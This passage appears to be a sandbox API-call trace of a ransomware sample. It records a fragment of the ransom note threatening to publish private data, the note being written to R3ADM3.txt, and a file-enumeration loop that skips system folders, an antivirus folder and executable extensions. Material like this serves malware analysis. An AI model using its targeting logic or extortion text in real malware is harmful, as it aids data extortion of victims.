we will publish private data on our news site. ") returned 227 [0137.299] WriteFile (in: hFile=0x6c4, lpBuffer=0x2825890*, nNumberOfBytesToWrite=0xe3, lpNumberOfBytesWritten=0x6fbfc38, lpOverlapped=0x0 | out: lpBuffer=0x2825890*, lpNumberOfBytesWritten=0x6fbfc38*=0xe3, lpOverlapped=0x0) returned 1 [0137.300] CloseHandle (hObject=0x6c4) returned 1 [0137.300] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xec2c08 | out: hHeap=0xea0000) returned 1 [0137.300] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xee4150 | out: hHeap=0xea0000) returned 1 [0137.300] FindFirstFileW (in: lpFileName="C:\\MSOCache\\All Users\\*", lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xe7b42810, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0x578cd510, ftLastAccessTime.dwHighDateTime=0x1d68245, ftLastWriteTime.dwLowDateTime=0x578cd510, ftLastWriteTime.dwHighDateTime=0x1d68245, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xecfbe0 [0137.300] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0137.300] FindNextFileW (in: hFindFile=0xecfbe0, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xe7b42810, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0x578cd510, ftLastAccessTime.dwHighDateTime=0x1d68245, ftLastWriteTime.dwLowDateTime=0x578cd510, ftLastWriteTime.dwHighDateTime=0x1d68245, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0137.301] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0137.301] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0137.301] FindNextFileW (in: hFindFile=0xecfbe0, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x578cd510, ftCreationTime.dwHighDateTime=0x1d68245, ftLastAccessTime.dwLowDateTime=0x578cd510, ftLastAccessTime.dwHighDateTime=0x1d68245, ftLastWriteTime.dwLowDateTime=0x578cd510, ftLastWriteTime.dwHighDateTime=0x1d68245, nFileSizeHigh=0x0, nFileSizeLow=0xe3, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="R3ADM3.txt", cAlternateFileName="")) returned 1 [0137.301] lstrcmpW (lpString1="R3ADM3.txt", lpString2=".") returned 1 [0137.301] lstrcmpW (lpString1="R3ADM3.txt", lpString2="..") returned 1 [0137.301] StrStrIW (lpFirst="R3ADM3.txt", lpSrch=".UAKXC") returned 0x0 [0137.301] StrStrIW (lpFirst="R3ADM3.txt", lpSrch=".exe") returned 0x0 [0137.301] StrStrIW (lpFirst="R3ADM3.txt", lpSrch=".dll") returned 0x0 [0137.301] StrStrIW (lpFirst="R3ADM3.txt", lpSrch=".lnk") returned 0x0 [0137.301] StrStrIW (lpFirst="R3ADM3.txt", lpSrch=".sys") returned 0x0 [0137.301] StrStrIW (lpFirst="R3ADM3.txt", lpSrch=".msi") returned 0x0 [0137.301] StrStrIW (lpFirst="R3ADM3.txt", lpSrch="R3ADM3.txt") returned="R3ADM3.txt" [0137.301] FindNextFileW (in: hFindFile=0xecfbe0, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xecdfa490, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xee38cbf0, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xee38cbf0, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="{90140000-0016-0409-1000-0000000FF1CE}-C", cAlternateFileName="{90140~3")) returned 1 [0137.301] lstrcmpW (lpString1="{90140000-0016-0409-1000-0000000FF1CE}-C", lpString2=".") returned 1 [0137.301] lstrcmpW (lpString1="{90140000-0016-0409-1000-0000000FF1CE}-C", lpString2="..") returned 1 [0137.301] StrStrIW (lpFirst="{90140000-0016-0409-1000-0000000FF1CE}-C", lpSrch="tmp") returned 0x0 [0137.301] StrStrIW (lpFirst="{90140000-0016-0409-1000-0000000FF1CE}-C", lpSrch="winnt") returned 0x0 [0137.301] StrStrIW (lpFirst="{90140000-0016-0409-1000-0000000FF1CE}-C", lpSrch="temp") returned 0x0 [0137.301] StrStrIW (lpFirst="{90140000-0016-0409-1000-0000000FF1CE}-C", lpSrch="thumb") returned 0x0 [0137.301] StrStrIW (lpFirst="{90140000-0016-0409-1000-0000000FF1CE}-C", lpSrch="$Recycle.Bin") returned 0x0 [0137.301] StrStrIW (lpFirst="{90140000-0016-0409-1000-0000000FF1CE}-C", lpSrch="$RECYCLE.BIN") returned 0x0 [0137.301] StrStrIW (lpFirst="{90140000-0016-0409-1000-0000000FF1CE}-C", lpSrch="System Volume Information") returned 0x0 [0137.301] StrStrIW (lpFirst="{90140000-0016-0409-1000-0000000FF1CE}-C", lpSrch="Boot") returned 0x0 [0137.302] StrStrIW (lpFirst="{90140000-0016-0409-1000-0000000FF1CE}-C", lpSrch="Windows") returned 0x0 [0137.302] StrStrIW (lpFirst="{90140000-0016-0409-1000-0000000FF1CE}-C", lpSrch="Trend Micro") returned 0x0 [0137.302] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x60) returned 0xed3498 [0137.302] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x30) returned 0xee4150 [0137.302] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x30) returned 0xee41c0 [0137.302] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x80) returned 0xedd4c0 [0137.302] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xee41c0 | out: hHeap=0xea0000) returned 1 [0137.302] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xee4150 | out: hHeap=0xea0000) returned 1 [0137.302] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xed3498 | out: hHeap=0xea0000) returned 1 [0137.302] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xee6e48 [0137.302] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x80) returned 0xedd438 [0137.302] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xedd4c0 | out: hHeap=0xea0000) returned 1 [0137.302] FindNextFileW (in: hFindFile=0xecfbe0, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xe8729610, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xecdfa490, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xecdfa490, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="{90140000-0018-0409-1000-0000000FF1CE}-C", cAlternateFileName="{90140~2")) returned 1 [0137.302] lstrcmpW (lpString1="{90140000-0018-0409-1000-0000000FF1CE}-C", lpString2=".") returned 1 [0137.302] lstrcmpW (lpString1="{90140000-0018-0409-1000-0000000FF1CE}-C", lpString2="..") returned 1 [0137.302] StrStrIW (lpFirst="{90140000-0018-0409-1000-0000000FF1CE}-C", lpSrch="tmp") returned 0x0 [0137.302] StrStrIW (lpFirst="{90140000-0018-0409-1000-0000000FF1CE}-C", lpSrch="winnt") returned 0x0 [0137.302] StrStrIW (lpFirst="{90140000-0018-0409-1000-0000000FF1CE}-C", lpSrch="temp") returned 0x0 [0137.302] StrStrIW (lpFirst="{90140000-0018-0409-1000-0000000FF1CE}-C", lpSrch="thumb") returned 0x0 [0137.302] StrStrIW (lpFirst="{90140000-0018-0409-1000-0000000FF1CE}-C", lpSrch="$Recycle.Bin") returned 0x0 [0137.302] StrStrIW (lpFirst="{90140000-0018-0409-1000-0000000FF1CE}-C", lpSrch="$RECYCLE.BIN") returned 0x0 [0137.302] StrStrIW (lpFirst="{90140000-0018-0409-1000-0000000FF1CE}-C", lpSrch="System Volume Information") returned 0x0 [0137.302] StrStrIW (lpFirst="{90140000-0018-0409-1000-0000000FF1CE}-C", lpSrch="Boot") returned 0x0 [0137.302] StrStrIW (lpFirst="{90140000-0018-0409-1000-0000000FF1CE}-C", lpSrch="Windows") returned 0x0 [0137.302] StrStrIW (lpFirst="{90140000-0018-0409-1000-0000000FF1CE}-C", lpSrch="Trend Micro") returned 0x0 [0137.302] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x60) returned 0xed3498 [0137.302] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x30) returned 0xee4150 [0137.302] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x30) returned 0xee41c0 [0137.302] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x80) returned 0xedd4c0 [0137.303] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xee41c0 | out: hHeap=0xea0000) returned 1 [0137.303] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xee4150 | out: hHeap=0xea0000) returned 1 [0137.303] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xed3498 | out: hHeap=0xea0000) returned 1 [0137.303] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xeeabf0 [0137.303] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x80) returned 0xedd3b0 [0137.303] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xedd4c0 | out: hHeap=0xea0000) returned 1 [0137.303] FindNextFileW (in: hFindFile=0xecfbe0, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xfc3e6570, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xfc8a9170, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xfc8a9170, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="{90140000-0019-0409-1000-0000000FF1CE}-C", cAlternateFileName="{9877A~1")) returned 1 [0137.303] lstrcmpW (lpString1="{90140000-0019-0409-1000-0000000FF1CE}-C", lpString2=".") returned 1 [0137.303] lstrcmpW (lpString1="{90140000-0019-0409-1000-0000000FF1CE}-C", lpString2="..") returned 1 [0137.303] StrStrIW (lpFirst="{90140000-0019-0409-1000-0000000FF1CE}-C", lpSrch="tmp") returned 0x0 [0137.303] StrStrIW (lpFirst="{90140000-0019-0409-1000-0000000FF1CE}-C", lpSrch="winnt") returned 0x0 [0137.303] StrStrIW (lpFirst="{90140000-0019-0409-1000-0000000FF1CE}-C", lpSrch="temp") returned 0x0 [0137.303] StrStrIW (lpFirst="{90140000-0019-0409-1000-0000000FF1CE}-C", lpSrch="thumb") returned 0x0 [0137.303] StrStrIW (lpFirst="{90140000-0019-0409-1000-0000000FF1CE}-C", lpSrch="$Recycle.Bin") returned 0x0 [0137.303] StrStrIW (lpFirst="{90140000-0019-0409-1000-0000000FF1CE}-C", lpSrch="$RECYCLE.BIN") returned 0x0 [0137.303] StrStrIW (lpFirst="{90140000-0019-0409-1000-0000000FF1CE}-C", lpSrch="System Volume Information") returned 0x0 [0137.303] StrStrIW (lpFirst="{90140000-0019-0409-1000-0000000FF1CE}-C", lpSrch="Boot") returned 0x0 [0137.303] StrStrIW (lpFirst="{90140000-0019-0409-1000-0000000FF1CE}-C", lpSrch="Windows") returned 0x0 [0137.303] StrStrIW (lpFirst="{90140000-0019-0409-1000-0000000FF1CE}-C", lpSrch="Trend Micro") returned 0x0 [0137.303] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x60) returned 0xed3498 [0137.303] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x30) returned 0xee4150 [0137.303] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x30) returned 0xee41c0 [0137.303] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x80) returned 0xedd4c0 [0137.303] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xee41c0 | out: hHeap=0xea0000) returned 1 [0137.303] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xee4150 | out: hHeap=0xea0000) returned 1 [0137.303] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xed3498 | out: hHeap=0xea0000) returned 1 [0137.303] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xeeacb8 [0137.303] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x80) returned 0xedd328 [0137.303] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xedd4c0 | out: hHeap=0xea0000) returned 1 [0137.303] FindNextFileW (in: hFindFile=0xecfbe0, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xee829690, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xf00dbad0, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xf00dbad0, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="{90140000-001A-0409-1000-0000000FF1CE}-C", cAlternateFileName="{9765F~1")) returned 1 [0137.303] lstrcmpW (lpString1="{90140000-001A-0409-1000-0000000FF1CE}-C", lpString2=".") returned 1 [0137.303] lstrcmpW (lpString1="{90140000-001A-0409-1000-0000000FF1CE}-C", lpString2="..") returned 1 [0137.304] StrStrIW (lpFirst="{90140000-001A-0409-1000-0000000FF1CE}-C", lpSrch="tmp") returned 0x0 [0137.304] StrStrIW (lpFirst="{90140000-001A-0409-1000-0000000FF1CE}-C", lpSrch="winnt") returned 0x0 [0137.304] StrStrIW (lpFirst="{90140000-001A-0409-1000-0000000FF1CE}-C", lpSrch="temp") returned 0x0 [0137.304] StrStrIW (lpFirst="{90140000-001A-0409-1000-0000000FF1CE}-C", lpSrch="thumb") returned 0x0 [0137.304] StrStrIW (lpFirst="{90140000-001A-0409-1000-0000000FF1CE}-C", lpSrch="$Recycle.Bin") returned 0x0 [0137.304] StrStrIW (lpFirst="{90140000-001A-0409-1000-0000000FF1CE}-C", lpSrch="$RECYCLE.BIN") returned 0x0 [0137.304] StrStrIW (lpFirst="{90140000-001A-0409-1000-0000000FF1CE}-C", lpSrch="System Volume Information") returned 0x0 [0137.304] StrStrIW (lpFirst="{90140000-001A-0409-1000-0000000FF1CE}-C", lpSrch="Boot") returned 0x0 [0137.304] StrStrIW (lpFirst="{90140000-001A-0409-1000-0000000FF1CE}-C", lpSrch="Windows") returned 0x0 [0137.304] StrStrIW (lpFirst="{90140000-001A-0409-1000-0000000FF1CE}-C", lpSrch="Trend Micro") returned 0x0 [0137.304] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x60) returned 0xed3498 [0137.304] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x30) returned 0xee4150 [0137.304] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x30) returned 0xee41c0 [0137.304] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x80) returned 0xedd4c0 [0137.304] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xee41c0 | out: hHeap=0xea0000) returned 1 [0137.304] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xee4150 | out: hHeap=0xea0000) returned 1 [0137.304] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xed3498 | out: hHeap=0xea0000) returned 1 [0137.304] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xeead08 [0137.304] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x80) returned 0xedd2a0 [0137.304] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xedd4c0 | out: hHeap=0xea0000) returned 1 [0137.304] FindNextFileW (in: hFindFile=0xecfbe0, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xfc8a9170, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xfe076d70, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xfe076d70, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="{90140000-001B-0409-1000-0000000FF1CE}-C", cAlternateFileName="{94E50~1")) returned 1 [0137.304] lstrcmpW (lpString1="{90140000-001B-0409-1000-0000000FF1CE}-C", lpString2=".") returned 1 [0137.304] lstrcmpW (lpString1="{90140000-001B-0409-1000-0000000FF1CE}-C", lpString2="..") returned 1 [0137.304] StrStrIW (lpFirst="{90140000-001B-0409-1000-0000000FF1CE}-C", lpSrch="tmp") returned 0x0 [0137.304] StrStrIW (lpFirst="{90140000-001B-0409-1000-0000000FF1CE}-C", lpSrch="winnt") returned 0x0 [0137.304] StrStrIW (lpFirst="{90140000-001B-0409-1000-0000000FF1CE}-C", lpSrch="temp") returned 0x0 [0137.304] StrStrIW (lpFirst="{90140000-001B-0409-1000-0000000FF1CE}-C", lpSrch="thumb") returned 0x0 [0137.304] StrStrIW (lpFirst="{90140000-001B-0409-1000-0000000FF1CE}-C", lpSrch="$Recycle.Bin") returned 0x0 [0137.304] StrStrIW (lpFirst="{90140000-001B-0409-1000-0000000FF1CE}-C", lpSrch="$RECYCLE.BIN") returned 0x0 [0137.304] StrStrIW (lpFirst="{90140000-001B-0409-1000-0000000FF1CE}-C", lpSrch="System Volume Information") returned 0x0 [0137.304] StrStrIW (lpFirst="{90140000-001B-0409-1000-0000000FF1CE}-C", lpSrch="Boot") returned 0x0 [0137.305] StrStrIW (lpFirst="{90140000-001B-0409-1000-0000000FF1CE}-C", lpSrch="Windows") returned 0x0 [0137.305] StrStrIW (lpFirst="{90140000-001B-0409-1000-0000000FF1CE}-C", lpSrch="Trend Micro") returned 0x0 [0137.305] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x60) returned 0xed3498 [0137.305] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x30) returned 0xee4150 [0137.305] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x30) returned 0xee41c0 [0137.305] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x80) returned 0xedd4c0 [0137.305] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xee41c0 | out: hHeap=0xea0000) returned 1 [0137.305] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xee4150 | out: hHeap=0xea0000) returned 1 [0137.305] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xed3498 | out: hHeap=0xea0000) returned 1 [0137.305] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xeead30 [0137.305] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x80) returned 0xedd218 [0137.305] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xedd4c0 | out: hHeap=0xea0000) returned 1 [0137.305] FindNextFileW (in: hFindFile=0xecfbe0, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xf00dbad0, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xf58c8770, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xf58c8770, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="{90140000-002C-0409-1000-0000000FF1CE}-C", cAlternateFileName="{92787~1")) returned 1 [0137.305] lstrcmpW (lpString1="{90140000-002C-0409-1000-0000000FF1CE}-C", lpString2=".") returned 1 [0137.305] lstrcmpW (lpString1="{90140000-002C-0409-1000-0000000FF1CE}-C", lpString2="..") returned 1 [0137.305] StrStrIW (lpFirst="{90140000-002C-0409-1000-0000000FF1CE}-C", lpSrch="tmp") returned 0x0 [0137.305] StrStrIW (lpFirst="{90140000-002C-0409-1000-0000000FF1CE}-C", lpSrch="winnt") returned 0x0 [0137.305] StrStrIW (lpFirst="{90140000-002C-0409-1000-0000000FF1CE}-C", lpSrch="temp") returned 0x0 [0137.305] StrStrIW (lpFirst="{90140000-002C-0409-1000-0000000FF1CE}-C", lpSrch="thumb") returned 0x0 [0137.305] StrStrIW (lpFirst="{90140000-002C-0409-1000-0000000FF1CE}-C", lpSrch="$Recycle.Bin") returned 0x0 [0137.305] StrStrIW (lpFirst="{90140000-002C-0409-1000-0000000FF1CE}-C", lpSrch="$RECYCLE.BIN") returned 0x0 [0137.305] StrStrIW (lpFirst="{90140000-002C-0409-1000-0000000FF1CE}-C", lpSrch="System Volume Information") returned 0x0 [0137.305] StrStrIW (lpFirst="{90140000-002C-0409-1000-0000000FF1CE}-C", lpSrch="Boot") returned 0x0 [0137.305] StrStrIW (lpFirst="{90140000-002C-0409-1000-0000000FF1CE}-C", lpSrch="Windows") returned 0x0 [0137.305] StrStrIW (lpFirst="{90140000-002C-0409-1000-0000000FF1CE}-C", lpSrch="Trend Micro") returned 0x0 [0137.305] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x60) returned 0xed3498 [0137.305] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x30) returned 0xee4150 [0137.305] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x30) returned 0xee41c0 [0137.305] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x80) returned 0xedd4c0 [0137.305] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xee41c0 | out: hHeap=0xea0000) returned 1 [0137.306] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xee4150 | out: hHeap=0xea0000) returned 1 [0137.306] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xed3498 | out: hHeap=0xea0000) returned 1 [0137.306] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xeead58 [0137.306] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x80) returned 0xedd190 [0137.306] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xedd4c0 | out: hHeap=0xea0000) returned 1 [0137.306] FindNextFileW (in: hFindFile=0xecfbe0, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xfc138cb0, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xfc3e6570, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xfc3e6570, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="{90140000-0043-0409-1000-0000000FF1CE}-C", cAlternateFileName="{95310~1")) returned 1 [0137.306] lstrcmpW (lpString1="{90140000-0043-0409-1000-0000000FF1CE}-C", lpString2=".") returned 1 [0137.306] lstrcmpW (lpString1="{90140000-0043-0409-1000-0000000FF1CE}-C", lpString2="..") returned 1 [0137.306] StrStrIW (lpFirst="{90140000-0043-0409-1000-0000000FF1CE}-C", lpSrch="tmp") returned 0x0 [0137.306] StrStrIW (lpFirst="{90140000-0043-0409-1000-0000000FF1CE}-C", lpSrch="winnt") returned 0x0 [0137.306] StrStrIW (lpFirst="{90140000-0043-0409-1000-0000000FF1CE}-C", lpSrch="temp") returned 0x0 [0137.306] StrStrIW (lpFirst="{90140000-0043-0409-1000-0000000FF1CE}-C", lpSrch="thumb") returned 0x0 [0137.306] StrStrIW (lpFirst="{90140000-0043-0409-1000-0000000FF1CE}-C", lpSrch="$Recycle.Bin") returned 0x0 [0137.306] StrStrIW (lpFirst="{90140000-0043-0409-1000-0000000FF1CE}-C", lpSrch="$RECYCLE.BIN") returned 0x0 [0137.306] StrStrIW (lpFirst="{90140000-0043-0409-1000-0000000FF1CE}-C", lpSrch="System Volume Information") returned 0x0 [0137.306] StrStrIW (lpFirst="{90140000-0043-0409-1000-0000000FF1CE}-C", lpSrch="Boot") returned 0x0 [0137.306] StrStrIW (lpFirst="{90140000-0043-0409-1000-0000000FF1CE}-C", lpSrch="Windows") returned 0x0 [0137.306] StrStrIW (lpFirst="{90140000-0043-0409-1000-0000000FF1CE}-C", lpSrch="Trend Micro") returned 0x0 [0137.306] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x60) returned 0xed3498 [0137.306] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x30) returned 0xee4150 [0137.306] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x30) returned 0xee41c0 [0137.306] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x80) returned 0xedd4c0 [0137.306] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xee41c0 | out: hHeap=0xea0000) returned 1 [0137.306] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xee4150 | out: hHeap=0xea0000) returned 1 [0137.306] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xed3498 | out: hHeap=0xea0000) returned 1 [0137.306] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xeead80 [0137.306] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x80) returned 0xedd108 [0137.306] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xedd4c0 | out: hHeap=0xea0000) returned 1 [0137.306] FindNextFileW (in: hFindFile=0xecfbe0, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xf6e34d70, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xfa13c510, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xfa13c510, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="{90140000-0044-0409-1000-0000000FF1CE}-C", cAlternateFileName="{91454~1")) returned 1 [0137.306] lstrcmpW (lpString1="{90140000-0044-0409-1000-0000000FF1CE}-C", lpString2=".") returned 1 [0137.306] lstrcmpW (lpString1="{90140000-0044-0409-1000-0000000FF1CE}-C", lpString2="..") returned 1 [0137.306] StrStrIW (lpFirst="{90140000-0044-0409-1000-0000000FF1CE}-C", lpSrch="tmp") returned 0x0 [0137.307] StrStrIW (lpFirst="{90140000-0044-0409-1000-0000000FF1CE}-C", lpSrch="winnt") returned 0x0 [0137.307] StrStrIW (lpFirst="{90140000-0044-0409-1000-0000000FF1CE}-C", lpSrch="temp") returned 0x0 [0137.307] StrStrIW (lpFirst="{90140000-0044-0409-1000-0000000FF1CE}-C", lpSrch="thumb") returned 0x0 [0137.307] StrStrIW (lpFirst="{90140000-0044-0409-1000-0000000FF1CE}-C", lpSrch="$Recycle.Bin") returned 0x0 [0137.307] StrStrIW (lpFirst="{90140000-0044-0409-1000-0000000FF1CE}-C", lpSrch="$RECYCLE.BIN") returned 0x0 [0137.307] StrStrIW (lpFirst="{90140000-0044-0409-1000-0000000FF1CE}-C", lpSrch="System Volume Information") returned 0x0 [0137.307] StrStrIW (lpFirst="{90140000-0044-0409-1000-0000000FF1CE}-C", lpSrch="Boot") returned 0x0 [0137.307] StrStrIW (lpFirst="{90140000-0044-0409-1000-0000000FF1CE}-C", lpSrch="Windows") returned 0x0 [0137.307] StrStrIW (lpFirst="{90140000-0044-0409-1000-0000000FF1CE}-C", lpSrch="Trend Micro") returned 0x0 [0137.307] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x60) returned 0xed3498 [0137.307] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x30) returned 0xee4150 [0137.307] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x30) returned 0xee41c0 [0137.307] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x80) returned 0xedd4c0 [0137.307] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xee41c0 | out: hHeap=0xea0000) returned 1 